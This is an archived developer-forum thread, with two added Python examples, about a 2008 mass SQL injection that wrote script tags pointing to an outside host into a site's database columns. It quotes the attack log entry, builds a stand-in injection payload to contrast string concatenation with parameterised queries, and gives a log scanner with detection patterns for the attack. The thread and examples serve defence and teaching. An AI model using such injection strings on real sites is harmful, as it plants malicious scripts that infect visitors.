Bytes | Software Development & Data Engineering Community

SQL Injection

- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?

2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.

3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?

thanks
Jun 27 '08 #1
shank wrote:
> - - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
> GET /sresult.asp
> title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> My table was evidently hit with SQL Injection. I searched the IIS
> logs and found hundreds of the below instances. Questions...
>
> 1) The end result was my image columns were updated to reflect:
> Original data: files/icons/ps987_75.jpg
> Updated data: files/icons/ps987_75.jpg<script
> src=http://www.advabnr.com/b.js></script>
> Thousands of records were updated like the above.
> I tried downloading http://www.advabnr.com/b.js to see what's inside,
> but it wasn't available.
> What could have been in the js file to cause such an update?

http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf

> 2) I don't see how they could have known the Table name or the column
> names. Same question as #1 I guess.

Same answer - by causing error messages that poor coding practice allows to
be returned to the user.

> 3) I was and still am using a stored procedure on that page to SELECT
> from the table. How do I stop similar malicious efforts from happening
> again?

Use parameters:
http://groups.google.com/group/micro...fedf4e1efd63a6
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jun 27 '08 #2
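Bob's "use parameters" answer, worked through as an added example (Python with an in-memory sqlite3 database standing in for SQL Server behind ADO; this is not code from the thread or from any of the posters). The table, its rows and the payload are constructed: the payload is a one-statement stand-in for the worm that appends the same script tag the poster found, because the real payload is not on this page. The page's column=t_asc parameter is a sort key, and ORDER BY cannot take a bound parameter, so that value is allow-listed rather than parameterised; every sort key other than t_asc is assumed.

```python
"""Vulnerable string concatenation next to the parameterised fix (added example)."""
import sqlite3

# Constructed stand-in for the worm payload: the real one (see later posts)
# walked the system tables; this one appends the script tag from the
# question to every row so the effect is visible in a single statement.
SCRIPT_TAG = "<script src=http://www.advabnr.com/b.js></script>"
PAYLOAD = "x'; UPDATE songs SET icon = icon || '" + SCRIPT_TAG + "'; --"

# Assumed sort keys for the page's "column" parameter: t_asc is the only one
# visible in the log, the other two are made up for the example.
SORT_KEYS = {"t_asc": "title ASC", "t_desc": "title DESC", "a_asc": "artist ASC"}


def fresh_db():
    """In-memory table shaped like the poster's, with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE songs (title TEXT, artist TEXT, icon TEXT)")
    con.executemany(
        "INSERT INTO songs VALUES (?, ?, ?)",
        [
            ("(Your Love Keeps Lifting Me) Higher And Higher",
             "Michael McDonald", "files/icons/ps987_75.jpg"),
            ("Minute by Minute", "Michael McDonald", "files/icons/ps988_75.jpg"),
        ],
    )
    con.commit()
    return con


def icons(con):
    """Current icon column, in insertion order."""
    return [row[0] for row in con.execute("SELECT icon FROM songs ORDER BY rowid")]


def search_unsafe(con, artist):
    """The classic-ASP anti-pattern: the request value is glued into the SQL text.

    executescript() stands in for Connection.Execute on SQL Server, which also
    runs every statement in the batch, so the attacker's UPDATE runs as well.
    """
    sql = "SELECT title FROM songs WHERE artist = '%s';" % artist
    con.executescript(sql)
    return sql


def search_safe(con, artist):
    """Bound parameter: the value can only ever be compared, never executed."""
    rows = con.execute("SELECT title FROM songs WHERE artist = ?", (artist,))
    return [row[0] for row in rows]


def order_by_clause(key):
    """ORDER BY cannot take a parameter, so the sort key is allow-listed."""
    try:
        return SORT_KEYS[key]
    except KeyError:
        raise ValueError("unknown sort key: %r" % key)


def demo():
    """Run the payload through both paths and report the table state after each."""
    con = fresh_db()
    before = icons(con)
    search_unsafe(con, PAYLOAD)
    after_unsafe = icons(con)

    con = fresh_db()
    hits = search_safe(con, PAYLOAD)
    after_safe = icons(con)
    return {"before": before, "after_unsafe": after_unsafe,
            "safe_hits": hits, "after_safe": after_safe}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The unsafe path rewrites every icon exactly as in the question; the parameterised path matches no row and leaves the table alone. The allow-list is the right tool for anything that is not a value (column names, sort direction, table names), which a parameter cannot carry.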


"Bob Barrows [MVP]" wrote:
shank wrote:
2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.

Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
Jun 27 '08 #3
Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
Jun 27 '08 #4
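Searching the IIS logs for these entries, as an added example that is not part of the thread: the scanner below URL-decodes each query-string parameter and flags both the script tag from the question and the DECLARE ... CAST(0x...) batch form that the ISC diary linked above describes. The three log lines are constructed (the first copies the entry in the question; the other client addresses are documentation ranges), the hex literal is simply "DECLARE" in UTF-16LE, and the indicator patterns are this example's own, not a complete signature set.

```python
"""Scan IIS W3C log lines for the injection patterns discussed in the thread (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed sample. Fields, as in the post: cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs-version. Line 1 reproduces the
# question's entry, line 2 is benign, line 3 is the hex-wrapped batch form.
SAMPLE_LOG = """\
GET /sresult.asp title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
GET /sresult.asp title=Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc 80 - 192.0.2.10 HTTP/1.1
GET /sresult.asp column=t_asc;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 198.51.100.7 HTTP/1.1
"""

INDICATORS = {
    # the tag the poster found stored in his image column
    "html-script-tag": re.compile(r"<\s*script\b", re.I),
    # DECLARE @x ... EXEC( : a second batch smuggled in after the real query
    "tsql-declare-exec": re.compile(r"\bDECLARE\s+@\w+.*\bEXEC\s*\(", re.I | re.S),
    # CAST(0x... AS [N]VARCHAR : the hex wrapper that hides the real statements
    "tsql-hex-cast": re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?)VARCHAR", re.I),
}


def decode_hex_literal(hex_digits, is_unicode):
    """Recover the text SQL Server would see after CAST(0x.. AS [N]VARCHAR)."""
    raw = bytes.fromhex(hex_digits)
    return raw.decode("utf-16-le" if is_unicode else "latin-1", errors="replace")


def parse_iis_line(line):
    """Split one W3C line into the fields this scanner needs; None if not a request line."""
    f = line.split()
    if len(f) < 7 or f[0] not in ("GET", "POST", "HEAD"):
        return None
    return {"method": f[0], "stem": f[1], "query": f[2], "ip": f[5]}


def inspect_query(query):
    """Decode each parameter and return one finding per matched indicator."""
    findings = []
    for pair in query.split("&"):          # split on & only; ';' is part of the payload
        name, _, value = pair.partition("=")
        value = unquote_plus(unquote_plus(value))   # second pass catches %2520-style double encoding
        for label, rx in INDICATORS.items():
            m = rx.search(value)
            if not m:
                continue
            finding = {"param": name, "indicator": label}
            if label == "tsql-hex-cast":
                finding["decoded_payload"] = decode_hex_literal(m.group(1), bool(m.group(2)))
            findings.append(finding)
    return findings


def scan_log(text):
    """Run inspect_query over every request line and tag findings with client IP and page."""
    results = []
    for line in text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        for finding in inspect_query(rec["query"]):
            finding.update(ip=rec["ip"], stem=rec["stem"])
            results.append(finding)
    return results


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding the hex literal is the step that matters for triage: the CAST form looks like noise in a raw log, but once decoded it shows which tables and columns the batch walked, which tells you what to restore.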

"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microsof t.com...
Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....

--
Mike Brind
Microsoft MVP - ASP/ASP.NET
Jun 27 '08 #5

"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microsof t.com...
>Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.

The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....
Ah. Not the one mentioned in the thread (which is plural).... but the one
that is frequently linked to from here.

Jun 27 '08 #6
Old Pedant wrote:
> "Bob Barrows [MVP]" wrote:
>> shank wrote:
>>> 2) I don't see how they could have known the Table name or the
>>> column names. Same question as #1 I guess.
>>
>> Same answer - by causing error messages that poor coding practice
>> allows to be returned to the user.
>
> No, not really. Oh, it's poor coding practice, but the original
> injection (not seen here) is code that goes and reads the system
> tables and tries to discover all user table names and all user
> VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the
> JavaScript into all those fields.

Yes, that's the other way, and it is covered in the links I provided, which
is what I meant by "same answer".

> It's pretty sophisticated, actually. But it's easily protected
> against by simply disallowing access to the system tables from the
> IUSR_xxx and IWAM_xxx accounts.

.... or whatever account is being used to connect to SQL Server.

> (Well, and of course by practicing
> good programming of the ASP page in the first place. But even with
> poor ASP code, if you set up the DB correctly the particular attack
> fails.)
>
> If you care, I think I can find a copy of the actual injection attack
> code still lurking, showing how it loops on all the tables and fields.

I've seen it - I just hadn't put the two cases together

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jun 27 '08 #7
Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <pa*******@hotmail.com> wrote in message
> news:eP**************@TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <Ol*******@discussions.microsoft.com> wrote in message
>> news:EF**********************************@microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to, appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....
>
> Ah. Not the one mentioned in the thread (which is plural).... but
> the one that is frequently linked to from here.

Oh my! That is embarrassing! I know Aaron used to recommend the use of
dynamic sql to execute stored procedures ... I'm sure he followed what
he preached, but I would have thought he knew to use a
limited-privileges account to connect to SQL. I'm going to give him the
benefit of the doubt and place the blame on the company that bought the
aspfaq site from him.

--
Microsoft MVP -- ASP/ASP.NET
Please reply to the newsgroup. The email account listed in my From
header is my spam trap, so I don't check it very often. You will get a
quicker response by posting to the newsgroup.
Jun 27 '08 #8
Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <pa*******@hotmail.com> wrote in message
> news:eP**************@TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <Ol*******@discussions.microsoft.com> wrote in message
>> news:EF**********************************@microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to, appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....

They seem to have cleared that up. No more Google warnings there.

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jun 27 '08 #9

"Bob Barrows [MVP]" <re******@NOyahoo.SPAMcomwrote in message
news:ez**************@TK2MSFTNGP05.phx.gbl...
Mike Brind [MVP] wrote:
>"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>>>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@micros oft.com...
Here's an example of how it was originally injected into at least
one web site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a
link to here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in
the thread you linked to appears to have been a victim of something
similar. Google results warn that aspfaq may harm your computer....

They seem to have cleared that up. No more Google warnings there.
That is indeed a relief.

Mike
Jun 27 '08 #10
"It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)"
I aplogize in advance if this is a stupid question, but in SQL Server 2005,
how do you deny access for the IUSR and IWAM accounts?
Thanks,
Adam

"Old Pedant" wrote:
>

"Bob Barrows [MVP]" wrote:
shank wrote:
2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.

No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
Jun 27 '08 #11
Adam wrote:
I aplogize in advance if this is a stupid question, but in
SQL Server 2005, how do you deny access for the IUSR and
IWAM accounts?
The same way you do any other accounts. But most of us do not use trusted
connections for our web apps, meaning that the login used in your connection
string should have restricted rights.

In our case, we almost always give that login NO RIGHTS, then grant EXECUTE
permissions on a procedure-by-procedure basis.

--
Dave Anderson

Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.
Jun 27 '08 #12

I have the solution to this problem...

I work at a news channel. Recently we launched our news website and it was
DAILY ATTACKED by this script. As a result, we used to restore the previous
database backup to avoid this problem. But after research, I have
written a script for every table affected. Now the website is
working smoothly.

I can provide this solution to you as well, but I will charge money for
it. For contact, my e-mail address is ha*************@yahoo.com.

*** Sent via Developersdex http://www.developersdex.com ***
Jul 2 '08 #13
hammad siddiqui wrote:
> I have the solution to this problem...
>
> I work at a news channel. Recently we launched our news website and it
> was DAILY ATTACKED by this script. As a result, we used to restore the
> previous database backup to avoid this problem. But after research, I
> have written a script for every table affected. Now the website
> is working smoothly.
>
> I can provide this solution to you as well, but I will charge money
> for it. For contact, my e-mail address is ha*************@yahoo.com.
LOLOLOLOLOL
ROFL

There are freely available scripts in several places. I hope nobody finances
this leech.

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jul 2 '08 #14

"hammad siddiqui" <ha*************@yahoo.comwrote in message
news:%2****************@TK2MSFTNGP06.phx.gbl...
>
I have the solution to this problem...

I work at a news channal. Recently we launch our news websit and it was
DAILY ATTACKED this script. as a result, we used to restore the privous
database backup to avoid this problem. But after research, i have
written a script for every table effected. Now that the website is
smoothly working.

I can provide this solution to you as well, but i will charge money for
it. For contact my e-mail address is ri**************@yahoo.com.
If I launched a web site that was attacked like this, I would expect to be
fired or sued - not charge people money for fixing my mistakes.

--
Mike Brind
Microsoft MVP - ASP/ASP.NET
Jul 2 '08 #15

It is one type of virus. Use a trigger and check the inserted data. Use this
code:

CREATE TRIGGER [Check_Code]
ON [EPI_TenderDetails]
AFTER INSERT, UPDATE
AS
BEGIN
    -- SET NOCOUNT ON added to prevent extra result sets from
    -- interfering with SELECT statements.
    SET NOCOUNT ON;

    -- Test every row in the inserted pseudo-table: assigning a single row
    -- into a variable would miss the rest of a multi-row INSERT or UPDATE.
    IF EXISTS (SELECT 1 FROM inserted
               WHERE TenderNo LIKE '%<script%' OR TenderNo LIKE '%script>%')
        ROLLBACK TRANSACTION;
END

*** Sent via Developersdex http://www.developersdex.com ***
Jul 5 '08 #16
"subrata roy" wrote:
> ...if exists (select * from inserted)
> select @Bus=TenderNo from inserted
> if @bus like '%<script%' or @bus like '%script>%'
> rollback
> -- Insert statements for trigger here ...
This does not address the core problem. Reaching your trigger implies that
injection has occurred. There is no guarantee that the next attack will use
SCRIPT tags.

For that matter, this nonsense forbids potential legitimate cases for
inserting SCRIPT tags. Imagine if a SQL injection forum kept rejecting your
post because you described the thing it was "protecting itself" against.

Bah.

--
Dave Anderson

Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.

Jul 5 '08 #17
